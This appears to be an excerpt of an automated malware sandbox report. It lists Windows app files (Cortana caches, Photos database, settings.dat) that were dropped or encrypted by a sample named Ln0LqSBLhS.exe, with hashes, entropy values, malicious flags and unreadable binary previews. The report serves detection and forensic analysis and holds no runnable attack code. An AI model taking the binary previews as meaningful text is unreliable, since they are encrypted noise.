                                                                                                                                                                                                    SSDEEP:3072:DTnAsZJftTCIG33Oq2/KIXxBBkNORgxhX0PPmWIvApAYNdE4:/nVT7KOq2CIBBBkNORgLXuYvnYNdE4
                                                                                                                                                                                                    MD5:565ABF6DD31F2655139AC62F8A25E1DB
                                                                                                                                                                                                    SHA1:6AB1F92511EABC269A4574AE11198238DD544925
                                                                                                                                                                                                    SHA-256:F9CA31B1C6AB9ADFB461042DF0EC8E5708925F54A464A000715D0B4C4D069963
                                                                                                                                                                                                    SHA-512:11F0E8F5D4DEE93D2044B2D6A9D889A994E36DA6807EEBFAB4FDEB27362C214C6FB7E5A7C619A62214C15EB660ACE29CA10B3585A145E757DBBCAAA21103B07F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....e.F..gC[.N.-B..0..g..4{....m..`.}..bb|.+....A.!.b.....B...h....jZ...,. ...IK...._.......a\N.q.hty>..zS.....t.8Sx+...x.....M.R..Z..7p.U...?...U..'i(...........x.-^.bT!l..0..6th.%...1..r.....3.s.w.C\..m.$.xS.3.y..Y.:.....4.....;#.."...N.YV.X...k.:!i.%.K..a.....f+...JD.w6...g..%...w......>J.8.8....bA.>.`R.mR.B6..V.;.|.cpU.......)(..FR.w......T^PA...!......I....\.E.W...w'.b.q......\]..eh.......v..K.5...q...k.7\.......j`.;1ZM..pB.R].E.~J...$.N.....#M.Kp6.r .o...z.W.q.b...k.....'l?.W.%...~_..k_.....o-..4..D..jF.J..JHM..a ..."W.<....6..V....C$..m.].S.N...!.):...|.U......L_./Zh. q-@.;2]..Zs..)~......L.0g.!.N...EC'....N.v....(...>.S.v~.....Y.[.o....l)ed.O....s..^.1N.V....._.o1..)b.3..*9.:W.....jl....+.....~Tz,"w...:....#.....y..'^.'BV..I6..c.N.R$sj0....d.`zX.-w.OB^....=k..v....U.(.jjO.n.N...~.^.z..D.q?.M..n.....mI..K.........c}....p".C..${.4..M9L.....b....<-......mfv',Y...T.....U1..q.Ay..x...E.@..X.X.|......P.c...(.Ef...#.......Y.7q9(`P%T
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132748172688006251.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):113704
                                                                                                                                                                                                    Entropy (8bit):7.998156441988739
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:+ymMk4X0ntVbb8qGo2+NzELvMbz5JwClRKafBS:+NdjGonNAjMblNLA
                                                                                                                                                                                                    MD5:73B180CE41FCB2D8E2F99741C7E668FA
                                                                                                                                                                                                    SHA1:8132BD3D8FD03542D816A4FC46EAB3C6FD0E23B8
                                                                                                                                                                                                    SHA-256:B497B9585FDEB8B5B1BBC0B25F13BE7FFF4B0648CAD4EB91AED972018DFBCBF1
                                                                                                                                                                                                    SHA-512:C23009FEBC63730FD570C58E33DEF9B52B6AA7290C152BA45BEAEFA04761EDA287D8DFD71C686C5DFB43C3D25FF465434A970C5C11013DF1E45F865A51E55E95
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .C.f.6..w..U.f;.0|P"=.sB.....maP.iL.........@...xa.......2..6.Iq.#Z...Q.C~...._iXE.7q...DW.Y.=.#.M.].(.G-R.i...d/.5m<.G}.!..9.5.<..F..}.ek..8..4#?....L...r.r..(.].`Dg.....c..n./OP.Qc...^.-......y.h....i<r.RS...SA.G.K1.5.C.....#.k;K.=_....9>..g..=..9..3..C-o_.;G..g1 H.....G.s...%....\9..H...." .. l...o..VM!F;]...~.%+.i...+....#~.t.3G...........P...Q..%..VEe.....XhR..,.1...V:..a..62...A......F.[...88<N.E.^.k#..1..rf`.]XbJ3.h.L.i.o...X.....J...4....N./...7H..jty.Qc6...U........:....m~.hS.W.f...;E.Q;...?...w).....u...k.R..x_.A.7R.J...K...d..,v...%.$.U..;....1..|.........#.3.>Y..P.....n.$:i....X..f...{.v.....]O..C....L.3e.?..>..ie<G;7E0..F...{a_HI.\...R...%r.I........c. fE.>.u.w.........%z&Q~.G/3..$*.:.. /....z.&.l.Nw.R.,n...~..].1..s.=.N.).Vx..t.. e..D.....u..'.........FU.) O.=.<.:,....^bpY#...I.....b..JZ....'.......".._kF...@A.K.....-&...,.>.I..../........r.......>....3k<.=..1...r......o..K['....j.0..}...8...e....|F...>HD.u....*.z..f
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998875594821301
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:Vs5JfUTgNg/ASwyIpQEZE4m89JvWNtjkIIj2I4fl1VfWow4Ojw3:VsvU0NgIWImEZ19JeNtIIPI4flHW2n3
                                                                                                                                                                                                    MD5:36B4040AEEBCBEB3F67C3917CD223416
                                                                                                                                                                                                    SHA1:BFC002CFD541A9602F39D78B8277DD366916785F
                                                                                                                                                                                                    SHA-256:E47A19F288BECB47E6FD4C764C0E66BC6A60EAE80ACC4879A9E27698AC40EA90
                                                                                                                                                                                                    SHA-512:E3EA105B81F8B586C9144040DC2F8C07F01654172727BDF2DF9B69534882A1BC05131971F5FF55B0F430C2C45A5E5C8788FEF72C71680F8162CEDCA0D45CBDC7
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: M./.9......T|&...\.n.h..m..`".a...Rh........._,..)....Si..>.e..N.E...`.ue..C..oUp...3.hO....4...2..T4?Pv..0.... ~>..f.,k9.).k..1..x].2=......(2..1..{..$...{c..]X2.m.8sLo.8...=.....8)S...#>.|M-B...m.}......H..-?.?..b.B4l.|=..OS.$.|&g.q.....o@R.f.tB.6G...:k..Q.7..@...s3.o.+.R......b..j..-.....F.5>.-.Q.2.....a....P... j.L....)._#...+..._.g5....21$.d.P...v.......V.m.xk...'.@..k...9....!......qa}._!....f..........z...x.e....N.:..K...RyX.x@.........5.H:QM.P..........T..._..{."6../......iI.q.;...\1.J.p#.Lv..i.req!..Q;D..^...$..1.*/.>$.t.k.y..-...Z`[..C......$E?..#......Z...?..J...[..A.3L.h.Q.O...T....uI..f....{.AY..|..U.T...4.pN.D<.r.xM..I.,...S.5..I?......p..;....X.fh=..m......WC...fa4..p..y.4.=7..f.3...p..-.Kxr.]....._...f...l....].+.2...|.t...t.J+.U.7......3I......7q.a.h.....oqI.$..(.*..W.T.Hu.L2|......{%...^1..2th.(5q-)R.0~l.N.>:.g3.c.=.,.^.B.giIj.^..Q.M....W.6q.......7..Y...@.n.a.v.....b(.i..+#9...Co..te.K..~..}...w...#p..^.......j
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):69684
                                                                                                                                                                                                    Entropy (8bit):7.997167907560507
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:f4otNAr8QhZBAq2TDzbxFD843jdOX/LKh+Aqm4/jAC:9ArFhZBAlb3OPY+04/1
                                                                                                                                                                                                    MD5:748AA4C3C60CB27894DFF2B900E83A1C
                                                                                                                                                                                                    SHA1:22DF25DC71886D2802788C5997D5481D99BF8FCB
                                                                                                                                                                                                    SHA-256:0ED773B079254337FC3CE8B3FBF343FDE326666004EEE562CC445138E8D2F04A
                                                                                                                                                                                                    SHA-512:05A0CF83E39101A5127DD047E3208598605F65C26ED3FB1F7B8554661F3C59762ECDAC2DB97991AA15CB43601775F6C211CB676315FB57179F2C2F90F9820D87
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: -.A.6...N...^h...p.{..|.qF.5u7.i.\oK\b.6....=@}..Q..J1.o..+.....v....T..$.4..1`..h...^...jW.(...S....%K.F%..Bh~..z.,ns...v\S..}%..4... ...2XZ..C.|.d2_..J.#..H?..K.$.....n.I...f.c.'..<...f...H......_...."uH.@s..L.:0.....m&N....f3..6.'.2\..0..:....E7J..o..7...X...s.=.[..E..Y@.5.....a..O.e76i......ks....Z....1.D.S.N.../..P."B..b.Y..J..[.X0.1Be%.F{....s..~.vz..r.o.}..u&.#.5v.*`.....{.`.0...G'.(?....q.\.*c{S.F"..@.R.f.#R.<!k....?f..T..B.vX.J.........(....:..y.......{9.C..K...d.1...IH.......V4kqxEp(..J...}.DJ...a...i..3.@`^...L...F.....r...S..PHK^.$...U...loyD....R....P.O%...._..Y=...U.(;..&.fd.\.x....QR........O.....9..xXcg....P#....4...U..V....g63J...0.(2......7......4...(V...RUO.k..........*^.\.6.C......+.!.....{.P?..L.....=.m.H.g".6!.....0D........J.........I...[z....|..\.B..cW....5k...a...`..4."3._.~.E5-....D.;(?..%.;........ .Q..~..P.P...o.{...=.:.....eL]s.=b=..q.....b.....[.L.6.jTP.H..'..!z^N0.e.....W....."....G...CpC....g...r5..)L$.-4
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977127218981107
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:9iF4eZ8aQR87DLAPv/ynJ7BIZSBdf4vzzqsVcrb+/CybeFYM:Yi+QRCDQ4QQfqfLAcO7
                                                                                                                                                                                                    MD5:5F6398CB60058D54B3C8643E72B9D0BF
                                                                                                                                                                                                    SHA1:2797860ECB1C0C103BBCEE9E89228E059F5F48D6
                                                                                                                                                                                                    SHA-256:5AE02B0D36AC7CF0A4584C805689F65DAE9FEC3346477CCB01E0716C2E4FAABE
                                                                                                                                                                                                    SHA-512:D08C4C9519427249DC5DB6A4C8B5B061294829C551FCC59E73DB34D2828FC72568AB9639DDE9814697172A5C124A80546F4DD31F3395BD31011E5DFC85FB180F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .h..Y.#.(MN.7.1..f..LY.x....\..0.?.......`.n...\8....2....s19...M+..8..k...(M...(.!C.Lo..p9.!V$!........eMP\...F.x.............F......z......{.....r........y.........w..?.s,0.4uD....E...`...#.([.<S.fcE.......,8.`.OS.N<I;.....<....c...!3..Z..n@.u'.h..'../...H..j.DZ.Qf..!.1[?t^....5.O..5.+(.[X.z*.h@...."`io#_a.{.3...;.8..........{.X-....v.e.zg...3....S8 .!..bTi$..J.>`..{.]=~y..............S;....MM.@.6BL.!.L.........d.z7r..[.....).......W.A..I/w.......C..X2V...>[..".E...=.#....y..Xe)...\.+W.E..pA0..7q..3.....oA.uH..>>|..fBb.l$..........Y.$...=.`.......G.J..9U....}..w.)....)b;<..E.-".F..n[G7qAf....(....f. ........-~.7...o..8G.n.cK.H.suzjD..m...^...Yks.w%+mn.......^h=.GS...o..Mxq..o..........H3Na.L.../M*. c..0W.+S...f.~..1.........m.3./e+.4.s..y..U...\....I"M.?...R...o.Le.Y.lZ...C..S,......R.X-.c.......&...1..v..tk.......U5..5!H(..9.....1[Q..}IA5..A."-/\=D.K.-.|.....h..~T.....JA.so.....D..M....'...d..|.Ncu.x....,J.A.~._4..W.Pa.R
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.974131231133848
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:BGtzABaYAUlNq+cCAMus047+PZEVBrPMbYd:YtzA3fzq+cCAMn047VJd
                                                                                                                                                                                                    MD5:866721EB1D10CA073BBD31C531D7B82D
                                                                                                                                                                                                    SHA1:2C4743ABC49B3816636CAB6A928B6D0D72E9A47B
                                                                                                                                                                                                    SHA-256:5A393C3F82E6C41610E99DD274FC78B1B524E912A24739EF45908A4132527133
                                                                                                                                                                                                    SHA-512:304E968E4EA667748BABC75D34AC5392932A2A3B2E35119C1BCB7560C6ADF052426DC606705C2D43063459DDD45590EE75B1DDF0FD87A46EA1650DD56545A89B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: \D3>e.(...1.H...Q...K...^...^1._.J.G..l.....%:h..{.-.....*...}.1 .e@8..'.......^....>.jh....Q.\..5?rQm ...2...Z....{.........s....T..'....|...~...2..4...].l0%jW...=.?.Z....v..u%y..M.9..%e....1.qZcb.U...1....f...$.$.`.....H..R.CD...a..\%.q9!.$...:...>..aR......6.....Zl..F.`R.3...'5.1u...N......~..)...h..dc"......y.....N}f........)...Z...'../Ch...'......OpZ.Ze.7$.Q.o.....g.o..y...[.....`.Tr.e......x.o.|..>..`..Qs2.h..b......WT......k...Py\..CpW.3..f.KpX.."7.f.D..Y9.._eR.g....y..%..B...3...-.....Ql..Qd.cGi....,.o.YE...2v......m..j...[yQ.....M.H..S.I.[8p..PM2.|......k..0T....`.W.d.w....DyW...?.m.V.LR.R.ez..K>...Q..X9.k.xE.....I.4...'.E.............o....>..{9.N.n...-M>....8..$...O..%.+tJ......................Y..{g...GD..LV*...d..7.7xj..V._..TCVV.......S.x.)..,b;.z\z....**. ]....q...-vy=S\..9~[4...........9\+.......Y.x.....'9e.8t...m.l..ds..v:f@......V.G.J.5.0vc.I.T..(...{...7.o.25X..."...^....Nn.L..a.r)....f."......C.pf....U".+.-..i.=
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.979141031960251
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:UyLzYFDn5idQY3+3CYSqWH5qR323C9ewO1SWz0JsxGfFWSX3BvK5cu4:f4FDn0VyJSP8f0ksGFWyBdu4
                                                                                                                                                                                                    MD5:55915BB57B10D6D57AC6A22A193B4BBB
                                                                                                                                                                                                    SHA1:87C61C1B5393F29B2999056D2A8B5C84EF32F97C
                                                                                                                                                                                                    SHA-256:E755E47AECB0F26E2135AA60E1E8DF5E7F30B18C55AC78986BC787D9602D8277
                                                                                                                                                                                                    SHA-512:E5E61D96C8E8E54CA0490E29ED4D26395AD49EF66BA030AA90276D74572319CF4066DE02EC81B56E383EDADDF9056ED5F525A9A0551D994E874C8D9EDFEC7728
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: J...[.6$..U...a..7.........?..s...y.g.N..o......Q*....:....L..O.V..0..j.q..L.......r.'.02\..?..a.:..6......M..y.q..Lk..ez9..G[}]...-r.P...+....%q/r....0...qS$..!f_r!T..8...f..2.....]......u.........:|........g.D.c..,.i...4...BI.zFZ..Hw a..?..w..3.~.=.....`.ROI......&*$..9...,9.a#.O^0..G!.....{,R..{.7....F~...#..X'....Q^..H......[fIL ..J....Z..;..fa...I.nl...f..6..R......*..1......t..ud.s..9..~g../..|..F...+u#4..E_....(.......47!..:.~..WD..z....C.&.?.@...x.0..;U9f.B9...1..8.>0......j...M.....Y*...2....F...........I.3&.N.d...>.....W.iP/......uXg....h.t..o...1..N....J..M...M#..a..?..DarR....t..2E.........[.......$..X.p[X.].,.T..8w.....H......T ..t{e...N:Xcp..v....|.1...j....V..O..../..6.:...r0[..i..=x...7.j.c.."1..^:.....P....-...t.c.PEQT...S...m...g..O......iq..C..)..].e.)..l5.A..-mn.....J....^%%<.k4.\..5b.. +.Q.be......m-...UR...rd..G.j.nV.zyuCD.._S.m.$...Q1..(dI9.->.......#..sw.'H.`=....dh."E.(..s?W...er.M.N...SA....D80SIxc...`I
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.984386576634609
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:PD+GCQfBmr/0gy8Dm83I9HmHHOun2HTXZPtam1AsFev:b+GCQ5o0Xcpq6HOBXymDK
                                                                                                                                                                                                    MD5:2726F305CD3E4922EB326E8637A153F7
                                                                                                                                                                                                    SHA1:F2AE93B95292680691EE1C5966A166EEEDDEA49A
                                                                                                                                                                                                    SHA-256:68B4037E1838C7857061B3F64929D77EFA22EC7BCFE51E7EE77A9B544685D2F0
                                                                                                                                                                                                    SHA-512:85FEE0F1C57C2FBEE1859EB53B744A46AF5194FBF77674673D6BB112C0D69F62900BAABAB97D0D1E7CCD389AE275DAFBDFCDA820A00D5DE69435DAFBB2010EBC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .+."}....dp...E....i.KZ.B..M.'..*...h.x.}...k..Mi.x.8..q..:.....r.@.W.+)A..%5.UC......MF...l7.|......m..IJ.a...PE.#.+..'_.:b..{vW_.c \E2...T....V?.DJ.z.(CJ...G........&N..).7..4!......$6M.eC...J.....ua>$...Y...{.{4.!....+.3..9..e.<...y......k.%.G.)^.2..>Z[..<vl..&..Kb&.p.C.T..kS7.;..Mf.Yp....5.M_.'..E.y....*.....^.....|.6...b...6....a8P.`h..v....#..:......jHb.!..i..$`...5.=n. .e...}|..}...(E'../O..$!$7.....,....[ .$i.x..M..LV.2.B_>...g...8.W)....Y!..X...t......L...x..B.....1.D..vr.^.T.AT.X....3f..BJ.A.;..q.Z.e..y#..w..Og...Rh....s....P..E2L.t..Y..../=...1..4-./....e.3.vI.O..Mc...L.k..w.......RA...5...r.....b9...gQoK:.a.[Jlv8..N}..i.W...}fK..e..fU.+.J..p...\.Q.RP5...+i..$...c...6[....t..Q..e....>8.b'v.;.h.$Q.HA.S...l.....z.%.g..eb%=.@OI2f...e..2.......=..gm...(.1.c........X]g.."..)\.......p!.!~D.A..vK=..~......Q/.Ad....f`..-"..7,5.....B........C-.t..O..8s.BOm.T.........b.].%.O........Fz.9...\....DnL5...0..#.. ...).@.E...G[G...M
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9790403468207005
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:dHWK9T3GIMnNXN/LSx/RGEGGC5Rz54e7RbreCJ:dZTWjT/LK/JGnb75eE
                                                                                                                                                                                                    MD5:30C16B2C90DE558C4588B10BE89310BE
                                                                                                                                                                                                    SHA1:5BDD74C0EE05B0B434F31F862C261469109EF3AA
                                                                                                                                                                                                    SHA-256:8329394E6E0F52DF26A3FF892AA5443EC2B6DE5BB6AA09C7D0FB2170DB587EF4
                                                                                                                                                                                                    SHA-512:58501000F82C49361CBC7B1770910A7CC391B8C5BA230C94BE64645B51D5087A5403A84D26FCBFB8CF1A1073147607B1ADDFCA6C9E04E74A452F806D7A2CB383
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .=IiR...4&..~Jl...=."s........U..GZ..b.u..H....*...36.......ch.3."8.s..6V.i...;.>c.l:..K..a.....4vI.'.Y...\.@...L...E....0B.Nnc...H^= .?........i...'Pb....!........V....u. T.....do..Es,.....-..X\.s...9...-F....G!..>Xs.f._.......:{.5.W.J5...da.l[.L.R.n...&.a..sA.&...#..S....a.x.J.]c.f_.....5....J..> .....r(....[..$..G$.(.1F........2..P!bZ..M..Nk.q....N;.|u...!*|......P.F..C...o.......Z..H.y.)..Z.=Wh....^.X@.....j... .-..a.*{...}8.,.^........io..n...He?....n2...YY....:./)gE..C...{.k.$N..&.{.Q.......X0..G....^.2%V.......,......S.w...y..fX.9.....Z.r.s...W..........m.Y\.%.!%H...|...a.=O../.o.!....<.u..l..._.m4...[l...WGJ"w...}....-.-...........c.r..?.G?.&".,....J....B}z!.3..k......e....:..=.g..%E....j3.-..F.?.`.D......\.3..m..y..r.c.....F.u.%.R..)R.IB.j.d...J.....|aH..{.._......@Zl...K.?....J.....(...}...&..uP...Z.Ff..fc.4pU......m.3U~.<.....Zw.M.$..m......^p.;p)rJ.:.;.a......\X.P8..`../M.D.m+X=..vK....h@..@.8..:..7E$e.F.(......`w..*(.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97624603181706
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:dllxXl/AQVO2P/JjY3X1eQ57YMerOdyeVaTxs7aBYm:dllDRVO6NyXEQ5Tcey0Dm
                                                                                                                                                                                                    MD5:3EC820426309BF0346AEA13E889704F6
                                                                                                                                                                                                    SHA1:1F76DC008A2F97DEF07AF9679DFD29CC4E9417CE
                                                                                                                                                                                                    SHA-256:B8E2779757CFA1E585D77F4FE22E5CF236AA5C70FFB7BB6D662A6EB3D4948F51
                                                                                                                                                                                                    SHA-512:2156503680F85C07EE12919A01E7A71E8E323C3FC6E97CBCA8F5AEBBDC7E1DD7793C483A94E91731CDDACC03549C3036707F4F4990FEEF3AEE24A4C379A7370A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: U.EB.w.........UM.........l..Hb..x..s.C.0V..R.@..L....Nc.m.....0.!. .....g/.hz9.@...!....W.F..?6r..5k...E...<8.p:..X.A.`J...'6l.-$S.n.9m.H4.....x..]z]Q.....`...HQ.../.20h.......Q0^.....zE...ty....!..).\....*f.kp./.0. cW..R_.u....#......3...;..@..*....[=.....}s.....t.>.....T.H.....m.,.R....t0r..+.....I..3.M.&..a.=..>fe.-.L..^P..Q..l...p.=..p..:....].Qn...R.T......p....[Z...n%d.L......:)wlj.oZ.F. .0.[....Y..Q.-..=DmZ.g..n..,..g..bT.... .wJu.O3..ms.k..,)....L=.h..U.wc....3....9}.....Zbp.+Il.5..j.5.V.v...g.b{h.W....lG..BW.B...;...B3T}....V.t...xm.S7R....CML.V\.....!`.....Q..p#..eN.s.i.............\..x>....hYT...9...g...vc\M....a..."|..v.....Dh.7g=~=[.hVMfT....q....a...z.S.:.q}y....3...85.I$dGW}2.o>..:..-.."..R....B....;.0..}.._/...Cv.ZL$..v..P..a..!..gZ.t|.CQ4.^...u.........tP..<...b.y..)4O._..L....$."...i.v.<ql.'<...)..flc..n..@x6-..S.T..Mi..sj~.T*..N.iE?.]...>G.{.)X.s`E..\.Q...{...C.^..D..I[#.. ..S.p.a.e.V.....YM.....L..s.I.#X..........n=...]EX<..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4425
                                                                                                                                                                                                    Entropy (8bit):7.953896022285417
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:dRl3uMQGz9kg9MLZxyCCrN6SQgKhDX5OBDijS/m/19:PRuMr0/CMS+hDXQeMG
                                                                                                                                                                                                    MD5:A0ED6355E6D6EC2B19740EB13B1BC30C
                                                                                                                                                                                                    SHA1:DFFF4916D91BE3DE06A3F3892D2577104BFDAC40
                                                                                                                                                                                                    SHA-256:68A81E2C9B0C336A3ABD369AF4809775CD77DA7F84CEB0CB8BABDAF5C23D79DC
                                                                                                                                                                                                    SHA-512:A43326B0FD0EC49B9A7F621FF5065660BBC3FC6BCDC886ABF0E0759BEA4F2860462D6D12D687BC4C8625E6D24858D2F12293A9AD36EEB359FCFEBB4F8992B2C1
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Io.uC..2..M..0....Y..!.W..C.H..d..M&J'g.Fl.]......wo]hw~..B.z..l.........~(.Y-.....S+.. ^.Pl......{..:&.9..^ .<.)?..N2.Q..S.0.f.o...8.A9..$....UMX...&\.;.g....=.......t..6.`-l.....E._?\..bD...X.j.|9f3sJ-.O.....-. ......C.'.-.....9NE?C.+0Fp->.F*2....b..V.......GQ.`c.......gZ.......Q...=n.......8..Y.......4..tS..M..WT.......T..$..(..#.kHn.|......&S@.AO...9b}.->A.`.0n.....~2A{@SG..:..<...]z..Cg..E......O...I.8u.......:......h.(.$..P![..|47...... ..F....flK(...\...D|Z..X^=.D....F,..r..s.x......6q..(.[..(C....tP.o.W.d.<i..W.&t..:........u....4..:...iO=r...\y!.....L.5&KB{ZfGL)2V,...F...v.].iU..r.R..|}(Xy&.DDY....8P.d.}.32H .#$p5.]..f....rd...<.@eE.26..5.w.......K.o....;.AKQ....YG^...0...o;-J.eXF.k.S...L..G.S...;...q...[4.E..[..".G.WF..6..S\.z.......W...rk.@.)T5N.?....eH.G..O..`....o=E....|...J.U".....e..N..(.p.Z.J.&.e'..?-......>...I..%.C3'.N..8...CR|.....qI.fO..e...J*..8...H...6..u0.d.w~{>M.8..<......@.;.G..y.....^...y.)...!_....D.8Z.]2
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):33097
                                                                                                                                                                                                    Entropy (8bit):7.9936477651645035
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:DHnVO2d8T0unuPq037LWktIcpReYn1YWQaU3+mXjEsw1p0q4G:gwunORkYn1YlpzEqG
                                                                                                                                                                                                    MD5:C8D28006EF25D1F72C536EBF6F047028
                                                                                                                                                                                                    SHA1:FCF0DF82A867A5E18B441C89F2E2B9C1D2455BE3
                                                                                                                                                                                                    SHA-256:99710C5812744F50389980C14F230142F515297CBB4CA2B8BAC76C7943E6EBC4
                                                                                                                                                                                                    SHA-512:55921D20A0DE5D55750E1968F6804AA0CD9E6BDBC8FA4083554628DFFB83248307D2A5030FB1403B0D6F587837C15BB5DDE3C1101D01BEB576C8F519D83ECD87
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..z.:8..YC.y.9.a...lR..G..P....@.x.....O.......4s...{n+.n..3...3A..D..M.....W.....az[..g...61Vr.L...,.....).~..... ....-i.G...5 mV.E....Z..l..XtX.k..3G.}...6.V..D..K..._.q.........[=?.F..!TW.?.....i.t..#$.5^=..[$..!....vv..5...yw.D.y;..6...>.[.F-._.PZ..,"...U..../.....t..W]>..*|.Q.6n...........xW."ks...c...}..x/.'..5.l=`R*..v....3U.M.2z\..Y...L..pZQ..D'..r.89..6...........m...zq".`h..m."..r.dl...=o.[..QN3.!.'....7...w./|.B.{......l..$L.w........p..b..... .WUO.A....t87.g..B..._L...g~.l.....Z]..EX...zb...WX...5m=$..ks....+..nZd.....yD...b.t......'..&...d.....FBy@.0...P..5.j..@XK...x...|.+......l>...Urb.........t......4v../~t.......;o1_{...|ir2...(.......1UVPE.f.Go..B..'.y6[..4......K.2.f..'s.sI.........?.2B=.(0..6._&%&-..L<.7..k.C.}.C|OL....3.W..,..P...-T>HW.h.`.>VK.fsH.g.....4.,.jS..h.w3......W;/..7...EA.k..0.. H.....j=...s...9......5mn\..l.....#....}...........W...'^.e0C.k.].9...."._..Z.......>...qz..o..K.`..m..#..F.st..GL6..
